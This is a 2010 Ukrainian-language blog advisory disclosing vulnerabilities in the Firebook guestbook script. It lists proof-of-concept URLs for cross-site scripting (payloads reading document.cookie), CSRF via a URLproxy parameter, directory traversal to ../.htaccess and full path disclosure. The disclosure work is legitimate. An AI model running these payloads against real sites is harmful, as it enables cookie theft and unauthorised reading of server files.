« Похакані сайти №100
Обхід захисту в Perl »

Уразливості в Firebook

15:17 17.06.2010

13.04.2010

У вересні, 27.09.2009, я знайшов Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal та Full path disclosure уразливості в Firebook. Це гостьова книга. Дані уразливості я виявив на сайті exwp.com. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

17.06.2010

CSRF:

http://site/path_to_firebook_admin/?URLproxy=http://site;

Можливі CSRF та DoS атаки на інші сайти.

XSS:

http://site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Приклад XSS на http://firebook.ru.

XSS:

Directory Traversal:

http://site/path_to_firebook_admin/?param=1;show=../.htaccess;
http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://site/path_to_firebook_admin/?param=1;show=param.txt;

http://site/guestbook/index.html?answer=guestbook/guest/1

Уразливі всі версії Firebook.


This entry was posted on 15:17 17.06.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.